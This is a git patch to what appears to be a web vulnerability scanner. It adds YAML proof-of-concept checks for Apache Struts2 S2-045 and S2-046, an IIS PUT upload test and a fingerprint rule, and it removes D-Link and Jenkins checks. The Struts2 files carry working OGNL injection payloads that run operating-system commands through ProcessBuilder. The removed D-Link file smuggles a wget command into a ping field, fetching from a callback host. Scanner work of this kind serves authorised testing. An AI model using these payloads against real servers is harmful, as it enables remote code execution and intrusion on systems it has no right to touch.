From 8664cf38337130c716e060aaeb789560e4be298f Mon Sep 17 00:00:00 2001 From: shadow1ng Date: Sun, 28 Feb 2021 15:20:18 +0800 Subject: [PATCH] =?UTF-8?q?=E4=BF=AE=E6=94=B9=E3=80=81=E6=B7=BB=E5=8A=A0po?= =?UTF-8?q?c?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- WebScan/info/rules.go | 1 + WebScan/pocs/dlink-cve-2019-16920-rce.yml | 19 ------------------- WebScan/pocs/iis6.0-put.yml | 21 +++++++++++++++++++++ WebScan/pocs/jenkins-cve-2018-1000600.yml | 13 ------------- WebScan/pocs/struts2-045-1.yml | 15 +++++++++++++++ WebScan/pocs/struts2-045-2.yml | 12 ++++++++++++ WebScan/pocs/struts2-045-3.yml | 12 ++++++++++++ WebScan/pocs/struts2-046-1.yml | 16 ++++++++++++++++ WebScan/pocs/struts2-046-2.yml | 16 ++++++++++++++++ 9 files changed, 93 insertions(+), 32 deletions(-) delete mode 100644 WebScan/pocs/dlink-cve-2019-16920-rce.yml create mode 100644 WebScan/pocs/iis6.0-put.yml delete mode 100644 WebScan/pocs/jenkins-cve-2018-1000600.yml create mode 100644 WebScan/pocs/struts2-045-1.yml create mode 100644 WebScan/pocs/struts2-045-2.yml create mode 100644 WebScan/pocs/struts2-045-3.yml create mode 100644 WebScan/pocs/struts2-046-1.yml create mode 100644 WebScan/pocs/struts2-046-2.yml diff --git a/WebScan/info/rules.go b/WebScan/info/rules.go index af8bcbf..ca92c0d 100644 --- a/WebScan/info/rules.go +++ b/WebScan/info/rules.go @@ -63,6 +63,7 @@ var RuleDatas = []RuleData{ {"华为 MCU", "code", "(McuR5-min.js)"}, {"TP-LINK Wireless WDR3600", "code", "(TP-LINK Wireless WDR3600)"}, {"泛微协同办公OA", "headers", "(ecology_JSessionid)"}, + {"泛微协同办公OA", "code", "(/spa/portal/public/index.js)"}, {"华为_HUAWEI_ASG2050", "code", "(HUAWEI ASG2050)"}, {"360网站卫士", "code", "(360wzb)"}, {"Citrix-XenServer", "code", "(Citrix Systems, Inc. XenServer)"}, diff --git a/WebScan/pocs/dlink-cve-2019-16920-rce.yml b/WebScan/pocs/dlink-cve-2019-16920-rce.yml deleted file mode 100644 index 8df53e7..0000000 --- a/WebScan/pocs/dlink-cve-2019-16920-rce.yml +++ /dev/null @@ -1,19 +0,0 @@ -name: poc-yaml-dlink-cve-2019-16920-rce -set: - reverse: newReverse() - reverseURL: reverse.url -rules: - - method: POST - path: /apply_sec.cgi - headers: - Content-Type: application/x-www-form-urlencoded - body: >- - html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20{{reverseURL}} - follow_redirects: true - expression: | - response.status == 200 && reverse.wait(5) -detail: - author: JingLing(https://hackfun.org/) - links: - - https://www.anquanke.com/post/id/187923 - - https://medium.com/@80vul/determine-the-device-model-affected-by-cve-2019-16920-by-zoomeye-bf6fec7f9bb3 diff --git a/WebScan/pocs/iis6.0-put.yml b/WebScan/pocs/iis6.0-put.yml new file mode 100644 index 0000000..de6c485 --- /dev/null +++ b/WebScan/pocs/iis6.0-put.yml @@ -0,0 +1,21 @@ +name: poc-yaml-iis-put-getshell +set: + filename: randomLowercase(6) + fileContent: randomLowercase(6) + +rules: + - method: PUT + path: /{{filename}}.txt + body: | + {{fileContent}} + expression: | + response.status == 201 + - method: GET + path: /{{filename}}.txt + follow_redirects: false + expression: | + response.status == 200 && response.body.bcontains(bytes(fileContent)) +detail: + author: Cannae(github.com/thunderbarca) + links: + - https://www.cnblogs.com/-mo-/p/11295400.html \ No newline at end of file diff --git a/WebScan/pocs/jenkins-cve-2018-1000600.yml b/WebScan/pocs/jenkins-cve-2018-1000600.yml deleted file mode 100644 index 663f427..0000000 --- a/WebScan/pocs/jenkins-cve-2018-1000600.yml +++ /dev/null @@ -1,13 +0,0 @@ -name: poc-yaml-jenkins-cve-2018-1000600 -set: - reverse: newReverse() - reverseUrl: reverse.url -rules: - - method: GET - path: /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl={{reverseUrl}} - expression: | - response.status == 200 && reverse.wait(5) -detail: - author: PickledFish(https://github.com/PickledFish) - links: - - https://devco.re/blog/2019/01/16/hacking-Jenkins-part1-play-with-dynamic-routing/ diff --git a/WebScan/pocs/struts2-045-1.yml b/WebScan/pocs/struts2-045-1.yml new file mode 100644 index 0000000..9259a77 --- /dev/null +++ b/WebScan/pocs/struts2-045-1.yml @@ -0,0 +1,15 @@ +name: poc-yaml-struts2_045-1 +set: + r1: randomInt(800, 1000) + r2: randomInt(800, 1000) +rules: + - method: GET + path: / + headers: + Content-Type: ${#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("Keyvalue",{{r1}}*{{r2}})}.multipart/form-data + follow_redirects: true + expression: | + response.headers["Keyvalue"].contains(string(r1 * r2)) +detail: + author: shadown1ng(https://github.com/shadown1ng) + diff --git a/WebScan/pocs/struts2-045-2.yml b/WebScan/pocs/struts2-045-2.yml new file mode 100644 index 0000000..18769e6 --- /dev/null +++ b/WebScan/pocs/struts2-045-2.yml @@ -0,0 +1,12 @@ +name: poc-yaml-struts2_045-2 +rules: + - method: GET + path: / + headers: + Content-Type: "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType('text/html;charset=UTF-8')).(#res.getWriter().print('struts2_security_')).(#res.getWriter().print('check')).(#res.getWriter().flush()).(#res.getWriter().close())}" + follow_redirects: true + expression: | + response.body.bcontains(b"struts2_security_check") +detail: + author: shadown1ng(https://github.com/shadown1ng) + diff --git a/WebScan/pocs/struts2-045-3.yml b/WebScan/pocs/struts2-045-3.yml new file mode 100644 index 0000000..8c6379f --- /dev/null +++ b/WebScan/pocs/struts2-045-3.yml @@ -0,0 +1,12 @@ +name: poc-yaml-struts2_045-3 +rules: + - method: GET + path: / + headers: + Content-Type: "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType('text/html;charset=UTF-8')).(#s=new java.util.Scanner((new java.lang.ProcessBuilder('echo struts2_security_check'.toString().split('\\\\s'))).start().getInputStream()).useDelimiter('\\\\AAAA')).(#str=#s.hasNext()?#s.next():'').(#res.getWriter().print(#str)).(#res.getWriter().flush()).(#res.getWriter().close()).(#s.close())}" + follow_redirects: true + expression: | + response.body.bcontains(b"struts2_security_check") +detail: + author: shadown1ng(https://github.com/shadown1ng) + diff --git a/WebScan/pocs/struts2-046-1.yml b/WebScan/pocs/struts2-046-1.yml new file mode 100644 index 0000000..f0ec629 --- /dev/null +++ b/WebScan/pocs/struts2-046-1.yml @@ -0,0 +1,16 @@ +name: poc-yaml-struts2_046-1 +set: + r1: b"-----------------------------\r\nContent-Disposition:\x20form-data;\x20name=\"test\";\x20filename=\"%{(#_=\'multipart/form-data\').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[\'com.opensymphony.xwork2.ActionContext.container\']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType(\'text/html;charset=UTF-8\')).(#res.getWriter().print(\'struts2_security_\')).(#res.getWriter().print(\'check\')).(#res.getWriter().flush()).(#res.getWriter().close())}\x00b\"\r\nContent-Type:\x20text/plain\r\n\r\n\r\n-----------------------------" +rules: + - method: POST + path: / + headers: + Content-Type: multipart/form-data; boundary=--------------------------- + follow_redirects: true + body: | + {{r1}} + expression: | + response.body.bcontains(b"struts2_security_check") +detail: + author: shadown1ng(https://github.com/shadown1ng) + diff --git a/WebScan/pocs/struts2-046-2.yml b/WebScan/pocs/struts2-046-2.yml new file mode 100644 index 0000000..81d12f3 --- /dev/null +++ b/WebScan/pocs/struts2-046-2.yml @@ -0,0 +1,16 @@ +name: poc-yaml-struts2_046-2 +set: + r1: b"-----------------------------\r\nContent-Disposition:\x20form-data;\x20name=\"test\";\x20filename=\"%{(#_=\'multipart/form-data\').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[\'com.opensymphony.xwork2.ActionContext.container\']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo\x20struts2_security_check').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}\x00b\"\r\nContent-Type:\x20text/plain\r\n\r\n\r\n-----------------------------" +rules: + - method: POST + path: / + headers: + Content-Type: multipart/form-data; boundary=--------------------------- + follow_redirects: true + body: | + {{r1}} + expression: | + response.body.bcontains(b"struts2_security_check") +detail: + author: shadown1ng(https://github.com/shadown1ng) +